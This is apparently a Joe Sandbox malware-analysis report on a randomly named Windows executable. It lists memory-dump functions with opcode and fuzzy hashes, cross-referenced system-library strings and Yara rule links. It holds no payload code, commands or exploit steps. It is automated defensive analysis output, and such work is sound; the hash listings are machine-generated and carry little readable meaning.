Instruction ID: f45332e894889e58fc44d35aa6de9d9e26ea7acb60028d39bd0466cb30a0a335
Opcode Fuzzy Hash: 3e05eaa8bbcc123042c9819f88de1e9e146d9e88642d40a5af0579caa406c015
Instruction Fuzzy Hash: 7690023120180802D6007158481470B104597D1302F56C011A1168595DC62D89916675

Uniqueness

Uniqueness Score: -1.00%

Function 01A82FE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a051055d82a55eb107609209b3518ec8350304efbb70ab310a8e6d714e4faeaf
Instruction ID: 773f94bf4913b3e0fcedbe396bfc8a0e95daa774fa9b43317835dbc416c5a181
Opcode Fuzzy Hash: a051055d82a55eb107609209b3518ec8350304efbb70ab310a8e6d714e4faeaf
Instruction Fuzzy Hash: A4900221211C0442D70075684C14B07104597D1303F56C115A0158594CC91D89A15625

Uniqueness

Uniqueness Score: -1.00%

Function 01A82F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bba8fc32a5c810f35d36517a9d6b49ee8d1a83527c31a5019f190a300ad499cd
Instruction ID: 963472bf1608150afd1386c4fbc921c127e468631776f90dd8a80e1d4d28dea7
Opcode Fuzzy Hash: bba8fc32a5c810f35d36517a9d6b49ee8d1a83527c31a5019f190a300ad499cd
Instruction Fuzzy Hash: 7C90026134140842D60071584414B061045D7E2301F56C015E1068594DC61DCD92622A

Uniqueness

Uniqueness Score: -1.00%

Function 01A82F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488c147bb970a58d4196eb0be6b69b30e6fb6661d39d2f3d0a2ea0bb3047970e
Instruction ID: 91689d3aefcef293de531f316c13013f5049425690ededf6f3099716fc9e70d3
Opcode Fuzzy Hash: 488c147bb970a58d4196eb0be6b69b30e6fb6661d39d2f3d0a2ea0bb3047970e
Instruction Fuzzy Hash: 8C90026121140442D60471584404706108597E2201F56C012A2158594CC52D8DA15229

Uniqueness

Uniqueness Score: -1.00%

Function 01A82EA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c12bab58b42a2718557d686072a73f487498815ae6a3092d0b9702d0d5ddc2
Instruction ID: 7f305d699bff56cedf6c73ccae5f634f3090855bc71d9c0d12cb7eb621c09939
Opcode Fuzzy Hash: 27c12bab58b42a2718557d686072a73f487498815ae6a3092d0b9702d0d5ddc2
Instruction Fuzzy Hash: FE90027120140802D64071584404746104597D1301F56C011A5068594EC65D8ED56769

Uniqueness

Uniqueness Score: -1.00%

Function 01A82E80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfefe8968202126514ac2730706ca93d63720168385adbbb16815f3af1a74fd3
Instruction ID: dcf3ddddee1c326a9c09d56b46aa18b7c59fb7602d8ea3f8e189361122fd79d7
Opcode Fuzzy Hash: dfefe8968202126514ac2730706ca93d63720168385adbbb16815f3af1a74fd3
Instruction Fuzzy Hash: F590022160140902D60171584404616104A97D1241F96C022A1028595ECA2D8AD2A235

Uniqueness

Uniqueness Score: -1.00%

Function 01A82EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2c34ddba507f6935522f634cd0c59f11a6a78963689869a98d2423dfd4dac8b
Instruction ID: 3adf784fb2d5d521449aa4a3eee13522bb05ba7391e8516a51be9468f09f31f7
Opcode Fuzzy Hash: f2c34ddba507f6935522f634cd0c59f11a6a78963689869a98d2423dfd4dac8b
Instruction Fuzzy Hash: 7B90026120180803D64075584804607104597D1302F56C011A2068595ECA2D8D916239

Uniqueness

Uniqueness Score: -1.00%

Function 01A82E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d78473af95a84db5a13e153ea5d78c0261ead3e5f349fa5e840c65d9b3df1157
Instruction ID: cce3983d0b71bcf91ce62690438afbbd14109f0c384ed34b787dd1beeb1f00df
Opcode Fuzzy Hash: d78473af95a84db5a13e153ea5d78c0261ead3e5f349fa5e840c65d9b3df1157
Instruction Fuzzy Hash: 8690022130140802D602715844146061049D7D2345F96C012E1428595DC62D8A93A236

Uniqueness

Uniqueness Score: -1.00%

Function 01A83090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae4fab7bac55661d879ffc81d01f14553393eca9ea2ef13be675b5c3aaefa767
Instruction ID: 46c659487ab47473fabf60bf9f0e0d4fe92d9a6691dbc28ae4b8a82a82caa2f1
Opcode Fuzzy Hash: ae4fab7bac55661d879ffc81d01f14553393eca9ea2ef13be675b5c3aaefa767
Instruction Fuzzy Hash: 2690022124140C02D640715884147071046D7D1601F56C011A0028594DC61E8AA567B5

Uniqueness

Uniqueness Score: -1.00%

Function 01A83010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3022267ab04f0dbd76a34eab77012daa8060754f0b0f0070b8f0088e195fa889
Instruction ID: f1058f92125b8a226d9a480d48a81a4ee9644418a4a9f189f778e7a1348d8d4a
Opcode Fuzzy Hash: 3022267ab04f0dbd76a34eab77012daa8060754f0b0f0070b8f0088e195fa889
Instruction Fuzzy Hash: 6F90022120184842D64072584804B0F514597E2202F96C019A415A594CC91D89955725

Uniqueness

Uniqueness Score: -1.00%

Function 01A835C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44808944106b08058a35befd24d234492bb0a376f6fc29db87a12bc3dcf74188
Instruction ID: 45a52dae6d0fada5a97582016e61f6051e4533c82756decaa2feedf171a43a8b
Opcode Fuzzy Hash: 44808944106b08058a35befd24d234492bb0a376f6fc29db87a12bc3dcf74188
Instruction Fuzzy Hash: 9F90023160550802D60071584514706204597D1201F66C411A04285A8DC79D8A9166A6

Uniqueness

Uniqueness Score: -1.00%

Function 01A839B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 518c17aee17f73ac3efe499fb0f34a25ee734a323e8948d586712213513c51fd
Instruction ID: c995db17d2cbc05fe1b69e8ac678840ed4a9a1254d70e387c69861065bea44d6
Opcode Fuzzy Hash: 518c17aee17f73ac3efe499fb0f34a25ee734a323e8948d586712213513c51fd
Instruction Fuzzy Hash: 2E90022124545502D650715C44046165045B7E1201F56C021A08185D4DC55D89956325

Uniqueness

Uniqueness Score: -1.00%

Function 01A83D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b2212a2500199bfaa4ec89e49bf7c6c7df131d5b74c47f34ea35ccf558b592b
Instruction ID: 3886ecedb4db61c5f7ad8de16590ff4eba9cc9efdaae6ea69d8570e6a08ae0e4
Opcode Fuzzy Hash: 9b2212a2500199bfaa4ec89e49bf7c6c7df131d5b74c47f34ea35ccf558b592b
Instruction Fuzzy Hash: F4900231202405429A4072585804A4E514597E2302F96D415A0019594CC91C89A15325

Uniqueness

Uniqueness Score: -1.00%

Function 01A83D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b4f8339943d08a49f822cd8924c6219c178b1694873a511175ac756681edf61
Instruction ID: b00e394c3440b8eb8a2803cfd381223021f42ac1770e12577d0310042acea8be
Opcode Fuzzy Hash: 4b4f8339943d08a49f822cd8924c6219c178b1694873a511175ac756681edf61
Instruction Fuzzy Hash: C190023520140802DA1071585804646108697D1301F56D411A0428598DC65C89E1A225

Uniqueness

Uniqueness Score: -1.00%

Function 01A82C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 4fbe7ffdb408fb9eb121401ae0c35e379bfd0880f4ec1be5fefdc471250a1e93
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01A82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01A8293C
___swprintf_l.LIBCMT ref: 01A8295E
___swprintf_l.LIBCMT ref: 01A829A3
___swprintf_l.LIBCMT ref: 01ABA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 01ABA54E
:%u.%u.%u.%u, xrefs: 01ABA5B8
ffff:, xrefs: 01ABA504
::%hs%u.%u.%u.%u, xrefs: 01ABA527

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: a39c8b1c4abfcdbf51df35ed55fdd52e7ee87172338d4fe15078e489292177fb
Instruction ID: 6cba3b8bcbf5be36de1bf099d387f43a6d08df7fc64710ea72b1f39295ff76bc
Opcode Fuzzy Hash: a39c8b1c4abfcdbf51df35ed55fdd52e7ee87172338d4fe15078e489292177fb
Instruction Fuzzy Hash: 9B51E6B6A00156BFCF11EBAD8980A7EFBF8BB49240714826AF465D7642D334DE50C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01AF2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01AF24A6
___swprintf_l.LIBCMT ref: 01AF24E2
___swprintf_l.LIBCMT ref: 01AF257D
___swprintf_l.LIBCMT ref: 01AF25A3
___swprintf_l.LIBCMT ref: 01AF25C8
___swprintf_l.LIBCMT ref: 01AF2608

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 01AF24DA
:%u.%u.%u.%u, xrefs: 01AF25FF
ffff:, xrefs: 01AF247D, 01AF249D
::%hs%u.%u.%u.%u, xrefs: 01AF249E

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 8dc07b0f503e07984e98e1bd6092e6137e2098aa5c5d027d152bb380245c2970
Instruction ID: ee37e71848d55295bbd96aeae633e2460390c4fdea044fae51199bd5c5207c97
Opcode Fuzzy Hash: 8dc07b0f503e07984e98e1bd6092e6137e2098aa5c5d027d152bb380245c2970
Instruction Fuzzy Hash: F051F675A04645AFDF31DFECC990A7EBBF8EF44201B04846EF696C7642D6B8DA408760

Uniqueness

Uniqueness Score: -1.00%

Function 01A77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01AB4742
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01AB46FC
Execute=1, xrefs: 01AB4713
CLIENT(ntdll): Processing section info %ws..., xrefs: 01AB4787
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01AB4725
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01AB4655
ExecuteOptions, xrefs: 01AB46A0

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: f7cbc768aa0ec6a07d9e9d631a9361841023aa022a0e012ff99154e0be91b841
Instruction ID: 6835f72815b1b747fc4cbe40e446d67055645e1b01369125f3cbb48ce2af8020
Opcode Fuzzy Hash: f7cbc768aa0ec6a07d9e9d631a9361841023aa022a0e012ff99154e0be91b841
Instruction Fuzzy Hash: 3951F53160021ABAEF21ABE9DD99FFE77B9BF18700F0400A9D605A7181E771AB45CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01B16940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction ID: 7e4655b1ee1ebd07e0d7ef52b2f32ea0030cbd3fa4586f0c01bb3bf18a99678a
Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
Instruction Fuzzy Hash: 0A024871508341AFD709DF18C590A6BBBE5FFC8700F858A6DF9898B258DB71E905CB82

Uniqueness

Uniqueness Score: -1.00%

Function 01A8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01A8B6BF

Strings

0, xrefs: 01A8B66F
0, xrefs: 01A8B695
-, xrefs: 01A8B650
+, xrefs: 01A8B65A

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 278883943b874c5464f3c74371910ae7b0dfebda66fddfd5a4e54b064f3ec501
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: C981AF70E162499EEF29BF6CC8517BEBFB1AF45320F1C4129D861A72D1C73498408B71

Uniqueness

Uniqueness Score: -1.00%

Function 01AF20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01AF214F
___swprintf_l.LIBCMT ref: 01AF2172

Strings

[, xrefs: 01AF212B
%%%u, xrefs: 01AF2146
]:%u, xrefs: 01AF2169

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 7ce7abca0289679ddd5f0cac22076f22db1a78d611825414d8dcacb02aa59ba4
Instruction ID: f4442f3bdd932e5dfc8c45978e4464c257c576fdebca34345a3d0013df113d74
Opcode Fuzzy Hash: 7ce7abca0289679ddd5f0cac22076f22db1a78d611825414d8dcacb02aa59ba4
Instruction Fuzzy Hash: 0021317AA00219ABDB11DFA9D940BFFBBF8AF54654F44011AFA05E3240E730D9118BA5

Uniqueness

Uniqueness Score: -1.00%

Function 01A6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01AB031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01AB02BD
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01AB02E7

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 87a12cb56440a5b1aa8b5856299d9f0e29f6c105740b31e653958edfca72b49b
Instruction ID: d6c65a7bba89caaa9884b1df0b50b05db2196fb0015ad02ad8df871b8650e953
Opcode Fuzzy Hash: 87a12cb56440a5b1aa8b5856299d9f0e29f6c105740b31e653958edfca72b49b
Instruction Fuzzy Hash: B6E1CD306087819FE725CF28D994B6ABBF8BB84314F140A6DF5A5CB2E2D774D844CB42

Uniqueness

Uniqueness Score: -1.00%

Function 01A7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 01AB7BAC
RTL: Resource at %p, xrefs: 01AB7B8E
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01AB7B7F

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 01d7a5ef3d90eb202155469543acd83fac7a5974c50cd516c97d0babf5e4a2f0
Instruction ID: 19d72321d3de476d61121199dd7fa0a56c314fc9a3ccfb174c29d6e651be67a5
Opcode Fuzzy Hash: 01d7a5ef3d90eb202155469543acd83fac7a5974c50cd516c97d0babf5e4a2f0
Instruction Fuzzy Hash: 8441E3713047429FD724DF29CD40B6AB7E5EF89B10F000A1DF95AD7281DB71EA058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 01A7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01AB728C

Strings

RTL: Re-Waiting, xrefs: 01AB72C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01AB7294
RTL: Resource at %p, xrefs: 01AB72A3

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 288cc393e9a0323e8481632f8b8312cba2a8b6d98bdcdaf3b740e150a0c47859
Instruction ID: 2fe88f7f9730ea04ba23c3e09b36b054e0806deb5b61271ea4a3a16529251851
Opcode Fuzzy Hash: 288cc393e9a0323e8481632f8b8312cba2a8b6d98bdcdaf3b740e150a0c47859
Instruction Fuzzy Hash: C0412071700242AFC720DF69CC81BAAB7A9FF94710F140619F955EB282DB71E9428BE0

Uniqueness

Uniqueness Score: -1.00%

Function 01AF2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01AF238D
___swprintf_l.LIBCMT ref: 01AF23B3

Strings

]:%u, xrefs: 01AF23AA
%%%u, xrefs: 01AF2384

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 801d60e71676ba66742d8e909c66c130eccf3b612488c32f3cd2417bcb432fb6
Instruction ID: 05b4005a38c600901f73a54765ebab4573506434d590b5b334cb44b139b5c19b
Opcode Fuzzy Hash: 801d60e71676ba66742d8e909c66c130eccf3b612488c32f3cd2417bcb432fb6
Instruction Fuzzy Hash: 0B315272A006199FDB61DF69CD40BEEB7F8EF54650F44455AF949E3240EB30EA448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01A87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01A87E8B

Strings

+, xrefs: 01A87DE8
-, xrefs: 01A87DDD

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction ID: 546f3dee75dce062100f42ad0f374239045f243d8ae33892025f9e3a3dc1b1ee
Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
Instruction Fuzzy Hash: 73919371E002169AEB24FFAEC8806BEBBB5BF44720F74451AE955E72C0DB349D41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01A49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 01A49191
@, xrefs: 01A49175

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 8fa183c8235ec8630aaa8da0003dbdd43cdd6cfe4d1777f83d05b10275c2d97b
Instruction ID: 092d7aef59a8e0c23d5f84ce68c15f66e07374e98d850e9b5e2a52b301df2478
Opcode Fuzzy Hash: 8fa183c8235ec8630aaa8da0003dbdd43cdd6cfe4d1777f83d05b10275c2d97b
Instruction Fuzzy Hash: F4812C71D012699BDB71CB58CD44BEEB7B4AF48754F0441EAEA09B7240D7305E94CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01ACCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 01ACCFBD

Strings

@, xrefs: 01ACCF0A
@4_w@4_w, xrefs: 01ACCFD5, 01ACCFDA, 01ACCFF1

Memory Dump Source

Source File: 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A10000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1a10000_IMG.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4_w@4_w
API String ID: 4062629308-713214301
Opcode ID: 46f2ad018824172ca3c835a8706bc9f64c5c98509747fd40b06b45f97ae874bc
Instruction ID: 07fc6199e50a57cb2ba7a19f282492b804d27cb82b04e10bfbd220a3ebd88ae7
Opcode Fuzzy Hash: 46f2ad018824172ca3c835a8706bc9f64c5c98509747fd40b06b45f97ae874bc
Instruction Fuzzy Hash: 0841AD71900215DFDB21EFA9C940AAEBBF8FF94B50F04442EE915DB264E734D901CBA5

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ySqETqNvdTbE.exePID: 8176, Parent PID: 1124COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	60
Total number of Limit Nodes:	5

Executed Functions

Function 07397968 Relevance: 3.5, Strings: 2, Instructions: 1042
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

3X2, xrefs: 07397D74
1a[9, xrefs: 07397D6A

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID: 1a[9$3X2
API String ID: 0-3189659699
Opcode ID: d7f9e2ac45fde20e028207e0f3e5eef6b4572ac6d3ce210b08a130b4a2e30f68
Instruction ID: 6b814be2a872b305c149e565c965385cbdb7d268d13370e3c9a8d751f0f188c6
Opcode Fuzzy Hash: d7f9e2ac45fde20e028207e0f3e5eef6b4572ac6d3ce210b08a130b4a2e30f68
Instruction Fuzzy Hash: D2B2C275A00628CFDB64CF69C984AD9BBB2BF89304F1581E9D50DAB365DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0739B8F8 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1561112045.0000000007390000.00000040.00000800.00020000.00000000.sdmp, Offset: 07390000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7390000_ySqETqNvdTbE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d61dcd20cd4b0a9075a07585e1d68ce6cce14014edf251f6d287c8d076970a2
Instruction ID: 186287c3cb70e306448a8262c57adc27c127d123039cea868c837419df5df3f5
Opcode Fuzzy Hash: 4d61dcd20cd4b0a9075a07585e1d68ce6cce14014edf251f6d287c8d076970a2
Instruction Fuzzy Hash: 8751E5B4E052199FDB04DFAAD5809AEFBF6FF89300F18C16AD418A7355DB30A941CB94

Uniqueness

Uniqueness Score: -1.00%

